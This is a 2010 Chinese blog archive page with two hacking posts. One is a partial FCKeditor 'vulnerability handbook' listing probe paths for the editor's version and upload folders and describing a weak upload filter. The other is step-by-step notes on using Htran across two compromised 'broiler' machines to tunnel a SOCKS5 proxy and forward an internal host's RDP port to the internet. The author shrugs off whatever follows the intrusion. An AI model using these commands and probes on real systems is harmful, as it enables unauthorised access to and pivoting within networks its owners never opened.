存档

2010年3月17日 的存档

网页编辑器漏洞手册

2010年3月17日 没有评论 296 views

FCKeditor
FCKeditor编辑器页/查看编辑器版本/查看文件上传路径
FCKeditor编辑器页
FCKeditor/_samples/default.html

查看编辑器版本
FCKeditor/_whatsnew.html

查看文件上传路径
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径

Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6
[Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言

FCKeditor被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3中File类别默认拒绝上传类型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
阅读全文...

分类: 技术文章 标签: ,

利用Htran把内网安全做成SOCKS5代理

2010年3月17日 没有评论 227 views

条件:肉鸡两台.一台在内网.一台在公网.
首先在那台内网肉鸡上运行CMD..执行..
htran.exe -install //安装socket5服务
htran -start //启动
启动了socket5服务,代理默认端口为8009
然后在公网肉鸡监听(临听任意两个端口):
htran -p -listen 119 120 //监听119 120端口

接下来在内网肉鸡再次执行:
htran -p -slave 公网肉鸡IP 119 127.0.0.1 8009

 

成功之后,在公网内鸡的CMD下会有显示..

 

接下来用用socketscap连接公网肉鸡的120端口就可以连接那台内网肉鸡了.

 

这个只是一个例子..最后的图片我是在SOCKSCAP里打开IE连接网页时的IP.
呵呵..速度暴快哦....
下面这个例子是把内网肉鸡的3389转发出来....
在公网肉鸡监听(临听任意两个端口):
htran -p -listen 119 120 //监听119 120端口
在内网的机器执行:
htran -p -slave 公网肉鸡IP 119 127.0.0.1 3389
这样是把这个内网肉鸡的3389转发到公网肉鸡的119端口上.
然后再用3389登陆器连接公肉肉鸡的120端口.
就可以连接到那台内网肉鸡的3389了.
可以连接进内网了...想干什么就不关我的事了....嘿嘿....
写得有点乱...看不懂也不要问我..这个只是我的实践笔记....

分类: 技术文章 标签: ,